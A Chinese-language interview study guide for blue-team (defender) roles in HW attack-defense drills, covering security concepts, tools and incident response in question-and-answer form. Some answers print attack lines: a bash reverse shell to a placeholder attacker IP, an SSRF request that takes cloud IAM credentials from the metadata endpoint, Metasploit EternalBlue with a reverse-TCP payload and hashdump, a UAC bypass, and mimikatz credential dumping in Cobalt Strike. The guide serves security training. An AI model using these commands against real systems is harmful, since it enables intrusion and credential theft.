HW 防守方 (蓝队) 面试总结
《HW 蓝队备战指南:从基础到高阶》
📌 导读
全网最全 HW 蓝队备战指南!从入门到精通 ✅ 基础概念 ✅ 实战案例 ✅ 高阶技巧文末领取《HW 防守方 (蓝队) 面试总结.pdf》+《应急响应手册》
什么是 HW 行动中的蓝队?
蓝队是网络实战攻防演练中的防守方,负责监控、分析、处置攻击行为,保护目标系统不被攻破,核心任务包括:
安全设备策略优化
实时攻击监测与预警
安全事件溯源分析
系统漏洞应急加固
……
🌟 一、基础概念篇(精选 19 问)
1. TOP10 漏洞有哪些?
失效的访问控制、加密机制失效、注入攻击、不安全设计、安全配置错误、过时组件、身份认证错误、数据完整性故障、日志监控故障、SSRF
2. 什么是 DDoS 攻击?如何防御?
攻击原理 :通过海量恶意请求(如 SYN Flood、UDP Flood)耗尽目标服务器的带宽、计算资源或连接数,导致正常用户无法访问服务。防御手段 :
流量清洗:通过 CDN 节点或专用设备过滤恶意流量(如阿里云盾、腾讯云 DDoS 防护)。
负载均衡:分散流量压力,避免单点过载。
云防护服务:利用云端资源弹性扩展,抵御超大规模攻击(推荐:华为云 DDoS 高防)。
3. DDoS 攻击与 CC 攻击的区别?
| DDoS 攻击(分布式拒绝服务) | CC 攻击(Challenge Collapsar) |
|---|---|
| 攻击层次 | 网络层 / 传输层(如 SYN Flood、UDP Flood) |
| 核心原理 | 通过海量无效流量(合法 / 非法包)耗尽目标带宽或连接数 |
| 攻击目标 | 网络资源(带宽、端口连接数) |
| 流量特征 | 流量峰值极高(可达数百 Gbps),包类型混杂(如 SYN、ICMP) |
| 典型手段 | 利用僵尸网络(Botnet)发起洪水攻击 |
| 防御重点 | 流量清洗(过滤无效包)、带宽扩容 |
4. 黑盒测试与白盒测试的区别?
| 维度 | 黑盒测试 | 白盒测试 |
|---|---|---|
| 视角 | 模拟用户,仅关注输入输出 | 基于源码 / 架构,分析内部逻辑与漏洞 |
| 权限 | 无源码访问权限 | 可读取 / 修改代码、调试接口 |
| 典型场景 | 功能验证、边界测试 | 代码审计(如 SQL 注入漏洞定位) |
5. 正向 Shell 与反向 Shell 的区别
正向 Shell :攻击者主动连接目标主机(如 telnet 目标IP 端口),需目标开放端口,易被防火墙拦截。
反向 Shell :目标主机主动连接攻击者(如 bash -i >& /dev/tcp/攻击IP/端口 0>&1),可绕过防火墙,适用于复杂网络环境(如企业内网渗透)。
6. 序列化与反序列化的安全风险
序列化将对象转为字节流,反序列化可能触发恶意代码执行(如 WebLogic T3 协议漏洞)。
7. CDN 验证方法?
多地 Ping 检测 IP 唯一性
nslookup解析差异
历史 DNS 记录查询
8. WAF 与防火墙的区别?
一句话总结 :一个守 “应用大门”,一个守 “网络关卡”。
WAF(Web 应用防火墙) :
专注 HTTP/HTTPS 层(七层)防护,针对 Web 应用攻击(如 SQL 注入、XSS、文件上传漏洞)。
典型功能:过滤恶意请求参数、阻断异常流量、保护 API 接口。
部署方式:云 WAF(如阿里云盾)、硬件 WAF、软件插件(如 ModSecurity)。
防火墙(Firewall) :
控制 网络层 / 传输层(三 / 四层)流量,基于 IP、端口、协议规则过滤(如禁止外部访问 3389 端口)。
典型功能:隔离内外网、阻止非法端口连接、防御 DDoS 流量洪水。
分类:包过滤防火墙、状态检测防火墙、下一代防火墙(NGFW,集成 IPS/IDS)。PS :下一代防火墙基本都集成了 WAF 模块,这里只是从传统意义上讲。
9. 蜜罐的作用及被攻击时的处理?
蜜罐 :网络世界的 “诱饵陷阱”
核心作用 :✅ 诱捕攻击者:模拟脆弱服务(如开放 RDP、SSH 端口),吸引黑客攻击,减少真实系统风险。✅ 攻击分析:记录攻击手法(如使用的漏洞、工具、C2 通信),为防御策略提供依据。✅ 威胁情报:通过蜜罐日志分析 APT 组织活动,预判攻击趋势。
被攻击时的处理流程 :① 隔离流量:立即断开蜜罐与生产网络的连接(如禁用网卡、封禁攻击 IP)。② 全量取证:镜像内存数据、保存日志文件(包括网络流量、操作记录),用于逆向分析。③ 特征提取:从攻击载荷中提取恶意代码哈希、C2 域名 / IP,更新入侵检测规则。④ 安全加固:检查蜜罐自身漏洞(如是否被植入后门),修复后重新部署。
10. SSRF 漏洞原理及利用场景?
原理 :通过控制服务器发起网络请求的漏洞,攻击者利用存在缺陷的 Web 应用作为代理,绕过网络边界限制,直接攻击内网或云环境中的敏感资源。典型场景 :
内网服务测绘与端口扫描
攻击手法:构造恶意 URL 参数(如http://127.0.0.1:8080),诱导服务器扫描内网 IP 段(如192.168.0.0/24),探测 Redis(6379)、MySQL(3306)等服务。
HW 案例:某厂商文件上传接口存在 SSRF,利用dict://``127.0.0.1:6379/info获取 Redis 未授权访问权限,写入 SSH 密钥提权。
云元数据服务窃取
攻击目标:AWS/Aliyun/ 腾讯云元数据接口(如http://169.254.169.254)。
利用链:
GET /api?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/EC2Role HTTP/1.1
→ 获取临时 AK/SK → 通过 AWS CLI 接管云主机。
攻击内网脆弱组件
Kubernetes API Server(8080/6443):未鉴权执行 Pod 创建。
Jenkins(8080):通过/script接口执行 Groovy 命令。
Payload 示例:
http://内网IP:8088/ws/v1/cluster/apps/new-application → 提交恶意作业
11. 常见端口及服务对应表(必背清单)
| 端口 | 服务 / 协议 | 风险提示 |
|---|---|---|
| 22 | SSH(远程管理) | 弱密码攻击高发,建议改用证书认证 |
| 80 | HTTP(明文传输) | 易被中间人攻击,推荐强制 HTTPS |
| 443 | HTTPS(加密传输) | 需定期更新证书,警惕过期漏洞 |
| 3306 | MySQL(数据库) | 暴露外网时需 IP 白名单 + 强密码策略 |
| 5900 | VNC(图形化远程控制) | 无认证或弱密码易被接管桌面 |
| 6379 | Redis(键值数据库) | 未授权访问可致数据泄露 / 删除 |
| 7001 | WebLogic(Java 应用服务器) | 历史漏洞多(如反序列化漏洞 CVE-2023-21839) |
12. 如何绕过 CDN 获取真实 IP?
子域名解析法 :
原理:部分子域名未启用 CDN,直接解析到真实 IP。
操作:使用nslookup、dig工具查询所有子域名(如*.``yourdomain.com),对比 IP 是否一致。
邮件服务器泄露 :
原理:企业邮箱服务器(如mail.yourdomain.com)常部署在内部网络,未经过 CDN。
操作:发送测试邮件,查看邮件头中的Received字段,提取服务器 IP。
F5 LTM 解码法 :
原理:F5 负载均衡设备的 Cookie(如BIGipServer)包含真实服务器节点信息。
操作:解析 Cookie 值(格式为节点 ID. 虚拟服务器 ID. 负载均衡组 ID),转换为 IP 地址(需工具辅助)。
补充技巧 :✅ 利用历史 DNS 记录(如 Censys、SecurityTrails 查询域名历史解析 IP)。✅ 检查网站错误页面:部分错误信息(如 500 内部错误)可能泄露真实 IP。
13. JSONP 跨域数据请求技术原理
JSONP(JSON with Padding) 是一种绕过浏览器同源策略的跨域数据交互技术,核心原理是通过动态创建<script>标签加载外部资源,利用回调函数处理返回数据。实现流程 :
客户端定义回调函数并发起请求:
function handleResponse(data) {
console.log('Received:', data);
}
const script = document.createElement('script');
script.src = 'https://api.example.com/data?callback=handleResponse';
document.body.appendChild(script);
服务端返回包装后的 JSON 数据:
handleResponse({"user":"admin","email":"admin@example.com"});
14. JSONP 跨域数据请求防御与检测方案
防御措施 :
输入输出过滤 :
回调函数白名单:使用正则表达式严格限制callback参数格式(如只允许字母数字)。
响应头加固:强制添加Content-Type: application/json,避免浏览器执行恶意脚本。
访问控制策略 :
Referer 校验(nginx):验证请求来源域名是否在白名单内。
Token 鉴权:要求携带一次性 Token 参数(如?token=7a3b9c),与服务端 Session 绑定验证。
攻击行为监测 :
高频调用不同callback函数名(如每秒 10 次以上)。
Referer 来源为未知域名或空值。
User-Agent 包含 Headless 浏览器特征(如 PhantomJS)。
15. Nmap 常用扫描参数及作用
基础扫描类型 :
-sS(TCP SYN 扫描):发送 SYN 包,根据响应判断端口状态(开放 / 关闭),半开放扫描,速度快且隐蔽性强。
-sT(TCP 连接扫描):建立完整 TCP 连接,直接确认端口可用性,适用于绕过简单防火墙。
-sU(UDP 扫描):检测 UDP 端口开放状态(如 DNS-53、SNMP-161),速度较慢(需等待 ICMP 不可达响应)。
端口与主机管理 :
-p <端口范围>:指定扫描端口(如-p 80,443或-p 1-1000)。
--top-ports <数量>:扫描最常见端口(如--top-ports 100)。
服务与系统识别 :
-sV:版本探测,识别服务及版本(如 Apache 2.4.39)。
-O:操作系统检测,通过 TCP/IP 协议栈指纹匹配操作系统类型。
16. Wireshark 抓包过滤规则示例
基础过滤 :
协议过滤:tcp(仅显示 TCP 流量)、udp.port == 53(DNS 查询)。
IP 地址过滤:ip.src == ``192.168.1.100(来源 IP)、ip.dst == ``10.0.0.1(目标 IP)。
高级特征过滤 :
HTTP 请求提取:http.request.method == "GET"(所有 GET 请求)、http.host contains "``example.com``"(特定域名)。
异常流量识别:tcp.flags.syn == 1 and tcp.flags.ack == 0(SYN 扫描特征)、tcp.analysis.retransmission(TCP 重传包)。
17. Volatility 内存分析流程
确定内存镜像类型 :
volatility -f <镜像文件> imageinfo
输出建议的 Profile(如Win10x64_19041)。
进程与网络分析 :
进程列表:pslist(显示活动进程,查找无父进程、路径异常的进程)。
网络连接:netscan(显示 TCP/UDP 连接,检测与 C2 服务器的长时间连接)。
恶意代码检测 :
DLL 检查:dlllist -p <PID>(查找无签名的恶意注入 DLL)。
代码注入检测:malfind(识别具有可执行权限的内存段)。
18. Metasploit 渗透测试流程
信息收集 :
use auxiliary/scanner/ssh/ssh\_login
set RHOSTS 10.0.0.0/24
set USER\_FILE users.txt
run
漏洞利用 :
use exploit/windows/smb/ms17\_010\_eternalblue
set RHOST 192.168.1.10
set PAYLOAD windows/x64/meterpreter/reverse\_tcp
set LHOST 攻击机IP
exploit
后渗透操作 :
Meterpreter 命令:getuid(查看当前权限)、hashdump(提取密码哈希)。
权限提升:
use post/windows/escalate/bypassuac
set SESSION 1
run
19. CS(Cobalt Strike)常用功能
监听器(Listeners) :
HTTP/HTTPS Beacon:模拟 Web 流量绕过检测。
DNS Beacon:通过 DNS 查询实现隐蔽通信。
攻击载荷生成 :
Attacks → Packages → Windows Executable
选项:选择Stageless、混淆Shellcode
横向移动技术 :
Psexec 横向渗透:通过 SMB 协议在域内扩散。
凭证窃取:
beacon> mimikatz sekurlsa::logonpasswords
写在最后:
防守方必做的 3 件 “脏活累活”:
清理离职人员账号(重点查 VPN 权限)
关闭闲置端口(全网扫描报告比对)
更新蜜罐诱饵数据(伪造财务 / 研发文档)